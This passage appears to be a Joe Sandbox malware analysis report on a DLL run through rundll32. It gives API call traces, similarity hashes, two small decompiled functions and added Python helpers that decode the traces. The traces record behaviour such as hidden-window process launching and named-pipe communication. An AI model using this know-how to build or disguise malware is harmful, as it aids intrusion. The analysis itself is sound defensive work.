                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                            • String ID:
                            • API String ID: 1711133254-0
                            • Opcode ID: affd0150b78fca2012f53f9e6befa1e49a31862d602d40c86015863e93bbc9fd
                            • Instruction ID: f2ba666274da878f328ebcd39bc8ad37ad006c44c534eb2f71041b60a55194e5
                            • Opcode Fuzzy Hash: affd0150b78fca2012f53f9e6befa1e49a31862d602d40c86015863e93bbc9fd
                            • Instruction Fuzzy Hash: 4E118CB2E4071CABE710AFB9B884A253BE5F78A314700152FE205DF200D7BDAC468F80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlEnterCriticalSection.NTDLL(04F8A428), ref: 04F6253B
                            • Sleep.KERNEL32(0000000A), ref: 04F62545
                            • SetEvent.KERNEL32 ref: 04F6259C
                            • RtlLeaveCriticalSection.NTDLL(04F8A428), ref: 04F625BB
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$EnterEventLeaveSleep
                            • String ID:
                            • API String ID: 1925615494-0
                            • Opcode ID: ac1a451b2ae28d33aa37b23b9e2f354c9836eeeeaba3bd6f394b9187e24e77f5
                            • Instruction ID: b290296bfe15ccc37460bf45be9e01e2cee8680d2b0c306293afda6d5d0ae5ea
                            • Opcode Fuzzy Hash: ac1a451b2ae28d33aa37b23b9e2f354c9836eeeeaba3bd6f394b9187e24e77f5
                            • Instruction Fuzzy Hash: 9B019670A40209FBE710AF61FC59F6A3BA9EB04705F00401AE606DE080D678AD058BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F80DDD: lstrlen.KERNEL32(?,?,00000000,04F67BEE), ref: 04F80DE2
                              • Part of subcall function 04F80DDD: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 04F80DF7
                              • Part of subcall function 04F80DDD: wsprintfA.USER32 ref: 04F80E13
                              • Part of subcall function 04F80DDD: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 04F80E2F
                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 04F67C06
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 04F67C15
                            • CloseHandle.KERNEL32(00000000), ref: 04F67C1F
                            • GetLastError.KERNEL32 ref: 04F67C27
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                            • String ID:
                            • API String ID: 4042893638-0
                            • Opcode ID: ef50fb05b50ee7bfcc2cb2511af1ccd9e8702e4e259c42954e6b93c23518fc69
                            • Instruction ID: a274948deab70e5fa881c223a231fd19aa5d01b1bdd329a44fc0bb2d02d88e71
                            • Opcode Fuzzy Hash: ef50fb05b50ee7bfcc2cb2511af1ccd9e8702e4e259c42954e6b93c23518fc69
                            • Instruction Fuzzy Hash: 40F02D725002187BE7103F65EC8CF6F7E9CEF05769F204119F50BE9180D674654287E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • InterlockedExchange.KERNEL32(04F8A060,00000000), ref: 04F68906
                            • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 04F68921
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F6894A
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04F6896B
                              • Part of subcall function 04F6DC41: SetEvent.KERNEL32(00000000,?,04F7507B), ref: 04F6DC56
                              • Part of subcall function 04F6DC41: WaitForSingleObject.KERNEL32(?,000000FF,?,?,04F7507B), ref: 04F6DC76
                              • Part of subcall function 04F6DC41: CloseHandle.KERNEL32(00000000,?,04F7507B), ref: 04F6DC7F
                              • Part of subcall function 04F6DC41: CloseHandle.KERNEL32(00000000,?,?,04F7507B), ref: 04F6DC89
                              • Part of subcall function 04F6DC41: RtlEnterCriticalSection.NTDLL(?), ref: 04F6DC91
                              • Part of subcall function 04F6DC41: RtlLeaveCriticalSection.NTDLL(?), ref: 04F6DCA9
                              • Part of subcall function 04F6DC41: CloseHandle.KERNEL32(00000000), ref: 04F6DCC5
                              • Part of subcall function 04F6DC41: LocalFree.KERNEL32(?), ref: 04F6DCD0
                              • Part of subcall function 04F6DC41: RtlDeleteCriticalSection.NTDLL(?), ref: 04F6DCDA
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                            • String ID:
                            • API String ID: 1103286547-0
                            • Opcode ID: b8978369b299a9a26d8523a3ca6a3641b5ed28f0291bfdbd60202c8e0cdcf1f0
                            • Instruction ID: f9de8847682795afb8505cc00eabba1413bcd6c5b5c0317cd6a6d08b6a42f4e1
                            • Opcode Fuzzy Hash: b8978369b299a9a26d8523a3ca6a3641b5ed28f0291bfdbd60202c8e0cdcf1f0
                            • Instruction Fuzzy Hash: 7DF06235B4121AB7EA312E65BC09F663E28DB85B65F14001DF606AF180DA6DEC06D7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrcatW.KERNEL32(?,?), ref: 04F74A5D
                              • Part of subcall function 04F6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 04F6F3DB
                              • Part of subcall function 04F6F39B: GetLastError.KERNEL32 ref: 04F6F3E5
                              • Part of subcall function 04F6F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 04F6F40A
                              • Part of subcall function 04F6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 04F6F42D
                              • Part of subcall function 04F6F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 04F6F455
                              • Part of subcall function 04F6F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 04F6F46A
                              • Part of subcall function 04F6F39B: SetEndOfFile.KERNEL32(00001000), ref: 04F6F477
                              • Part of subcall function 04F6F39B: CloseHandle.KERNEL32(00001000), ref: 04F6F48F
                            • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,04F6E4AF,?,?,00001000,?,?,00001000), ref: 04F74A80
                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,04F6E4AF,?,?,00001000,?,?,00001000), ref: 04F74AA2
                            • GetLastError.KERNEL32(?,04F6E4AF,?,?,00001000,?,?,00001000), ref: 04F74AB6
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                            • String ID:
                            • API String ID: 3370347312-0
                            • Opcode ID: c04df3f6f66191df81fec793dc285e9c92f1e5ed6eceeb32a739c021d86fb879
                            • Instruction ID: 5fb8d34b509794358e217a3bff5216f34477306787912c503411db4574d80ce1
                            • Opcode Fuzzy Hash: c04df3f6f66191df81fec793dc285e9c92f1e5ed6eceeb32a739c021d86fb879
                            • Instruction Fuzzy Hash: C5F06231244609FBEB119F60BC0AF6A3B65EF05710F100119FA03ED1D0E779A962DBAA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memset.NTDLL ref: 04F7D601
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04F6DB8C,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 04F7D616
                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,04F63EC6,?,?), ref: 04F7D623
                            • CloseHandle.KERNEL32(?,?,?,?,04F63EC6,?,?), ref: 04F7D635
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateEvent$CloseHandlememset
                            • String ID:
                            • API String ID: 2812548120-0
                            • Opcode ID: 387de522f7f79d6fa5d27c77ff4cd9edcca3d451b776d0f9e6b6000954887fae
                            • Instruction ID: af68e72ed6d3e5146e1a8e3de1b67a76bd4d15e91942d77d56945ca22dc7d574
                            • Opcode Fuzzy Hash: 387de522f7f79d6fa5d27c77ff4cd9edcca3d451b776d0f9e6b6000954887fae
                            • Instruction Fuzzy Hash: 37F0FEB550431C7FD3206F66DCC4C27BBECFF56298B11492EF14686511D679A8068A60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                             			E04A1227F(void* __esi) {
                             				/* __esi points at a 0x38-byte context block. It is zeroed and given two
                             				   manual-reset events (CreateEventA bManualReset = 1): the one at +0x1c
                             				   starts non-signaled, the one at +0x20 starts signaled. Returns 1 on
                             				   success, 0 if either event could not be created. */
                             				int _v4;          /* result flag; the decompiler typed it as SECURITY_ATTRIBUTES* */
                             				void* _t8;
                             				void* _t10;
                             
                             				_v4 = 0;
                             				memset(__esi, 0, 0x38);
                             				_t8 = CreateEventA(0, 1, 0, 0);        /* manual-reset, initially non-signaled */
                             				 *(__esi + 0x1c) = _t8;
                             				if(_t8 != 0) {
                             					_t10 = CreateEventA(0, 1, 1, 0);   /* manual-reset, initially signaled */
                             					 *(__esi + 0x20) = _t10;
                             					if(_t10 == 0) {
                             						CloseHandle( *(__esi + 0x1c));  /* roll back the first event */
                             					} else {
                             						_v4 = 1;
                             					}
                             				}
                             				return _v4;
                             			}

                            APIs
                            • memset.NTDLL ref: 04A1228D
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,761F81D0,00000000,00000000), ref: 04A122A2
                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04A122AF
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,04A1593D,00000000,?), ref: 04A122C1
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                             • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: CreateEvent$CloseHandlememset
                            • String ID:
                            • API String ID: 2812548120-0
                            • Opcode ID: 37cf58db3abf8d20e1889a897ca2db331d69e2603272d48d2150acc7dc62ffae
                            • Instruction ID: 554da26ab4ce3040544b57373febe3036bb3ea3f0d2c5769094fa0681f41b285
                            • Opcode Fuzzy Hash: 37cf58db3abf8d20e1889a897ca2db331d69e2603272d48d2150acc7dc62ffae
                            • Instruction Fuzzy Hash: 87F054F15043087FD3105F61DCC4C2BBBACEB91198B114D6DF14292121D675F8158A70
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,04F64BD6,000000FF,0631B7F0,?,?,04F7B7F2,0000003A,0631B7F0), ref: 04F74AE0
                            • GetLastError.KERNEL32(?,?,04F7B7F2,0000003A,0631B7F0,?,04F7A2EB,00000001,?,00000000,00000000,00000000,?,04F6109E,04F89F2C,00000008), ref: 04F74AEB
                            • WaitNamedPipeA.KERNEL32(00002710), ref: 04F74B0D
                            • WaitForSingleObject.KERNEL32(00000000,?,?,04F7B7F2,0000003A,0631B7F0,?,04F7A2EB,00000001,?,00000000,00000000,00000000,?,04F6109E,04F89F2C), ref: 04F74B1B
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                            • String ID:
                            • API String ID: 4211439915-0
                            • Opcode ID: f2caa39c6f251700ca3579eaaa9bb3850081e2fa88e91c982ca620ca1a798794
                            • Instruction ID: 47b87d1c31939ef78ab97f3db2af8b5335bf26a5eade52981207e10d6f07d4cd
                            • Opcode Fuzzy Hash: f2caa39c6f251700ca3579eaaa9bb3850081e2fa88e91c982ca620ca1a798794
                            • Instruction Fuzzy Hash: E3F06D32E01529BBE2201E69BC4CF6A7E65EF01365F11562AFA19AA190D2282C41DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(?,?,00000000,04F67BEE), ref: 04F80DE2
                            • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 04F80DF7
                            • wsprintfA.USER32 ref: 04F80E13
                              • Part of subcall function 04F7C01F: memset.NTDLL ref: 04F7C034
                              • Part of subcall function 04F7C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,774CDBB0,00000020,00000000), ref: 04F7C06D
                              • Part of subcall function 04F7C01F: wcstombs.NTDLL ref: 04F7C077
                              • Part of subcall function 04F7C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,774CDBB0,00000020,00000000), ref: 04F7C0A8
                              • Part of subcall function 04F7C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04F6A645), ref: 04F7C0D4
                              • Part of subcall function 04F7C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 04F7C0EA
                              • Part of subcall function 04F7C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04F6A645), ref: 04F7C0FE
                              • Part of subcall function 04F7C01F: CloseHandle.KERNEL32(?), ref: 04F7C131
                              • Part of subcall function 04F7C01F: CloseHandle.KERNEL32(?), ref: 04F7C136
                            • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 04F80E2F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                            • String ID:
                            • API String ID: 1624158581-0
                            • Opcode ID: 0917e2adac5b72fe2ee21dd89701e1fe72a14fff98cde51fc8236f3e56cbcde6
                            • Instruction ID: a155bbb01c99ed666ccf5fffef80d9ce2bd16929b1a8fb4406219b7bd8a6dfde
                            • Opcode Fuzzy Hash: 0917e2adac5b72fe2ee21dd89701e1fe72a14fff98cde51fc8236f3e56cbcde6
                            • Instruction Fuzzy Hash: E3F05432A01115BBD6211A19BC08F7B7BACDBC1B25F160119FA05EE291DA689C0A96A4
                            Uniqueness

                            Uniqueness Score: -1.00%
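The API listings above (the named-pipe client function whose calls sit at 04F74AE0..04F74B1B and the process-launching helper 04F7C01F) print raw Win32 arguments as hex stack slots. The Python below is an added example, not Joe Sandbox code or anything from the sample; it parses those lines and decodes what a practitioner actually wants to know: the access mask and creation disposition of CreateFile, the creation flags of CreateProcess (0x0C000000 is CREATE_NO_WINDOW|CREATE_DEFAULT_ERROR_MODE), timeouts, the TerminateProcess exit code, and the open-then-WaitNamedPipe sequence that is the standard client-side handling of a busy named pipe. The sample trace text is copied from the listings above; the decoding tables are the documented Win32 values. Because the sandbox drops unresolved pointer slots inconsistently (the filename slot is printed as `?` in CreateFileW but is absent in CreateFileA above), the decoder finds the access mask by its GENERIC_* bits instead of by position.

```python
"""Decode the 'APIs' trace lines of this report into Win32 semantics.

Added example, not Joe Sandbox code. The *_TRACE strings are copied from the
listings above; the tables are documented Win32 constants. The sandbox prints
resolved stack slots and sometimes drops a pointer slot it could not resolve
(compare CreateFileW(?,80000000,...) with CreateFileA(C0000000,...) above), so
the decoder locates values by shape where it can, not by fixed position.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

LINE_RE = re.compile(r"(?:Part of subcall function (?P<via>[0-9A-Fa-f]+):\s*)?"
                     r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
                     r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?")
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x40000000: "FILE_FLAG_OVERLAPPED", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}
PROC_FLAGS = {0x08000000: "CREATE_NO_WINDOW", 0x04000000: "CREATE_DEFAULT_ERROR_MODE", 0x00000004: "CREATE_SUSPENDED"}

# Constructed sample input: trace lines copied verbatim from the listings above.
PIPE_TRACE = """
• CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,04F64BD6,000000FF,0631B7F0,?,?,04F7B7F2,0000003A,0631B7F0), ref: 04F74AE0
• GetLastError.KERNEL32(?,?,04F7B7F2,0000003A,0631B7F0,?,04F7A2EB,00000001,?,00000000,00000000,00000000,?,04F6109E,04F89F2C,00000008), ref: 04F74AEB
• WaitNamedPipeA.KERNEL32(00002710), ref: 04F74B0D
"""
PROCESS_TRACE = """
• Part of subcall function 04F7C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,774CDBB0,00000020,00000000), ref: 04F7C0A8
• Part of subcall function 04F7C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 04F7C0EA
"""
FILE_TRACE = """
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,04F6E4AF,?,?,00001000,?,?,00001000), ref: 04F74AA2
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]   # one int per printed slot, None for '?'
    ref: str                    # call-site address
    via: Optional[str]          # sub-function the sandbox attributed the call to


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one '• Name.MODULE(args), ref: ADDR' line; None for non-API lines."""
    m = LINE_RE.match(line.strip().lstrip("•").strip())
    if not m:
        return None
    slots = (m.group("args") or "").split(",")
    args = [None if s.strip() == "?" else int(s, 16) for s in slots if s.strip()]
    return ApiCall(m.group("name"), m.group("mod"), args, m.group("ref") or "", m.group("via"))


def parse_trace(text: str) -> List[ApiCall]:
    return [c for c in map(parse_api_line, text.splitlines()) if c]


def decode_flags(value: Optional[int], table: dict) -> str:
    """Render a bitmask as NAME|NAME (high bits first); unknown bits stay as hex."""
    if value is None:
        return "?"
    names = [n for bit, n in sorted(table.items(), reverse=True) if value & bit]
    leftover = value & ~sum(bit for bit in table if value & bit)
    return "|".join(names + ([hex(leftover)] if leftover else [])) or "0"


def describe(call: ApiCall) -> str:
    """Readable meaning of the calls that occur in this report's listings."""
    a = call.args
    if call.name.startswith("CreateFile"):
        # The access mask is the first slot with GENERIC_* bits set; the filename
        # slot before it is printed as '?' in some lines and dropped in others.
        i = next((k for k, v in enumerate(a) if v is not None and v & 0xF0000000), None)
        if i is None:
            return f"{call.name}: access mask not found"
        disp = a[i + 3] if i + 3 < len(a) else None    # dwCreationDisposition
        flags = a[i + 4] if i + 4 < len(a) else None   # dwFlagsAndAttributes
        return (f"{call.name}: access={decode_flags(a[i], ACCESS)} "
                f"disposition={DISPOSITION.get(disp, '?')} flags={decode_flags(flags, FILE_FLAGS)}")
    if call.name.startswith("CreateProcess"):   # slot 5 is dwCreationFlags
        return f"{call.name}: creation flags={decode_flags(a[5] if len(a) > 5 else None, PROC_FLAGS)}"
    if call.name.startswith(("WaitNamedPipe", "Sleep", "WaitForSingleObject")):
        # Handle/name slots are often missing in this listing, so the first
        # resolved slot is taken as the timeout; confirm against the disassembly.
        return f"{call.name}: timeout={next((v for v in a if v is not None), '?')} ms"
    if call.name == "TerminateProcess" and len(a) > 1 and a[1] is not None:
        return f"{call.name}: exit code {hex(a[1])} ({a[1]})"
    return call.name


def find_pipe_client_retry(calls: List[ApiCall]) -> Optional[str]:
    """Ref of a CreateFile followed by GetLastError and then WaitNamedPipe: the
    documented client sequence for a busy named pipe (open, ERROR_PIPE_BUSY,
    WaitNamedPipe, retry)."""
    names = [c.name for c in calls]
    for i, c in enumerate(calls):
        if c.name.startswith("CreateFile") and "GetLastError" in names[i + 1:]:
            j = names.index("GetLastError", i + 1)
            if any(n.startswith("WaitNamedPipe") for n in names[j + 1:]):
                return c.ref
    return None


if __name__ == "__main__":
    for c in parse_trace(PIPE_TRACE + PROCESS_TRACE + FILE_TRACE):
        print(f"{c.ref}: {describe(c)}")
    print("pipe client retry at", find_pipe_client_retry(parse_trace(PIPE_TRACE)))
```

Run it as a script to print one decoded line per call. The trailing slots the sandbox prints after the real parameters are return addresses and caller locals (04F7B7F2, 0631B7F0 and so on), so nothing past the prototype's last parameter should be decoded, and any positional guess made here should be checked against the disassembly before it goes into a report.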

                            APIs
                            • RtlEnterCriticalSection.NTDLL(0631C2D0), ref: 04F66540
                            • Sleep.KERNEL32(0000000A), ref: 04F6654A
                            • HeapFree.KERNEL32(00000000,?), ref: 04F66572
                            • RtlLeaveCriticalSection.NTDLL(0631C2D0), ref: 04F66590
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                            • String ID:
                            • API String ID: 58946197-0
                            • Opcode ID: 097752c473314839b3c7d4bf48af9479d86668b1fca49c9ebe5c896750290cda
                            • Instruction ID: ce5a64293b6e4f8e151f2250c122bacbf4da399d986fbd75942018de2db5df03
                            • Opcode Fuzzy Hash: 097752c473314839b3c7d4bf48af9479d86668b1fca49c9ebe5c896750290cda
                            • Instruction Fuzzy Hash: D5F03470A00246AFE7209F28FC4AF2A3BA5EF10304F00841EB506EE291D638FC41DB66
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                             			E04A17607() {
                             				/* Shutdown path. 0x4a1a30c holds an event handle (0x2c0 in this dump),
                             				   0x4a1a35c a counter the loop waits to reach zero, and 0x4a1a2d8 the
                             				   private heap that E04A172C7 frees buffers into. */
                             				void* _t1;
                             				intOrPtr _t5;
                             				void* _t6;
                             				void* _t7;
                             				void* _t11;
                             
                             				_t1 =  *0x4a1a30c; // 0x2c0
                             				if(_t1 == 0) {
                             					L8:
                             					return 0;
                             				}
                             				SetEvent(_t1);                    /* wake whatever waits on the event */
                             				_t11 = 0x7fffffff;                /* wait budget in ms, effectively unbounded */
                             				while(1) {
                             					SleepEx(0x64, 1);             /* 100 ms, alertable: queued APCs still run */
                             					_t5 =  *0x4a1a35c; // 0x0
                             					if(_t5 == 0) {                /* counter reached zero */
                             						break;
                             					}
                             					_t11 = _t11 - 0x64;
                             					if(_t11 > 0) {
                             						continue;
                             					}
                             					break;                        /* budget exhausted */
                             				}
                             				_t6 =  *0x4a1a30c; // 0x2c0
                             				if(_t6 != 0) {
                             					CloseHandle(_t6);
                             				}
                             				_t7 =  *0x4a1a2d8; // 0x5140000
                             				if(_t7 != 0) {
                             					HeapDestroy(_t7);             /* tear down the private heap */
                             				}
                             				goto L8;
                             			}

                            APIs
                            • SetEvent.KERNEL32(000002C0,00000001,04A15E70), ref: 04A17612
                            • SleepEx.KERNEL32(00000064,00000001), ref: 04A17621
                            • CloseHandle.KERNEL32(000002C0), ref: 04A17642
                            • HeapDestroy.KERNEL32(05140000), ref: 04A17652
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                             • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: CloseDestroyEventHandleHeapSleep
                            • String ID:
                            • API String ID: 4109453060-0
                            • Opcode ID: 3feb16a9669f38d52168275591468342f2849654bf6f6afa1fc71579179edd25
                            • Instruction ID: a950b5cf60de1d1d3213d11b779a296fbaf3f7ff4d1ee67f97f1d897fe895a6c
                            • Opcode Fuzzy Hash: 3feb16a9669f38d52168275591468342f2849654bf6f6afa1fc71579179edd25
                            • Instruction Fuzzy Hash: 92F065BDB4231297EB106B39994CB9337DCEB347A1B051510BD25D72B0DB28EC45D560
                            Uniqueness

                            Uniqueness Score: -1.00%
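Each function entry's Similarity block carries an "API ID" such as Wait$CreateErrorFileLastNamedObjectPipeSingle. Comparing those strings with the APIs lists above suggests how they are built: every API name (sub-function calls included) is stripped of its A/W/Ex suffix and split into CamelCase words, a few words (Get, Set, For, Rtl, End, Of) are dropped, and the remaining words are grouped by how often they occur, most frequent group first with "$" between groups and the words inside a group sorted in ASCII order and concatenated. The Python below is an added reconstruction inferred from this page, not Joe Sandbox's published algorithm; the stop-word list is an assumption, and it does not account for the last listing on this page, whose StrChrA (SHLWAPI) calls are absent from its API ID. The sample input is copied from the listings above and reproduces the four IDs shown there. Knowing that the key ignores argument values, call order and module tells you what "similar" means when this section is used to cluster functions.

```python
"""Rebuild the 'API ID' similarity key from a function's 'APIs' listing.

Added example, not Joe Sandbox code: the grouping rule is inferred from the
IDs printed on this page, and STOP is an assumption that fits every listing
here except the one whose StrChrA (SHLWAPI) calls are not reflected in its
ID. The *_APIS strings are copied from the listings above.
"""
import re
from collections import Counter
from typing import Dict, List

NAME_RE = re.compile(r"(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(\w+)\.(\w+)")
STOP = {"Get", "Set", "For", "Rtl", "End", "Of"}   # assumed: words the IDs never contain

EVENT_APIS = """
• memset.NTDLL ref: 04F7D601
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04F6DB8C,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 04F7D616
• CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,04F63EC6,?,?), ref: 04F7D623
• CloseHandle.KERNEL32(?,?,?,?,04F63EC6,?,?), ref: 04F7D635
"""
PIPE_APIS = """
• CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,04F64BD6,000000FF,0631B7F0,?,?,04F7B7F2,0000003A,0631B7F0), ref: 04F74AE0
• GetLastError.KERNEL32(?,?,04F7B7F2,0000003A,0631B7F0,?,04F7A2EB,00000001,?,00000000,00000000,00000000,?,04F6109E,04F89F2C,00000008), ref: 04F74AEB
• WaitNamedPipeA.KERNEL32(00002710), ref: 04F74B0D
• WaitForSingleObject.KERNEL32(00000000,?,?,04F7B7F2,0000003A,0631B7F0,?,04F7A2EB,00000001,?,00000000,00000000,00000000,?,04F6109E,04F89F2C), ref: 04F74B1B
"""
PROCESS_APIS = """
• lstrlen.KERNEL32(?,?,00000000,04F67BEE), ref: 04F80DE2
• RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 04F80DF7
• wsprintfA.USER32 ref: 04F80E13
  • Part of subcall function 04F7C01F: memset.NTDLL ref: 04F7C034
  • Part of subcall function 04F7C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,774CDBB0,00000020,00000000), ref: 04F7C06D
  • Part of subcall function 04F7C01F: wcstombs.NTDLL ref: 04F7C077
  • Part of subcall function 04F7C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,774CDBB0,00000020,00000000), ref: 04F7C0A8
  • Part of subcall function 04F7C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04F6A645), ref: 04F7C0D4
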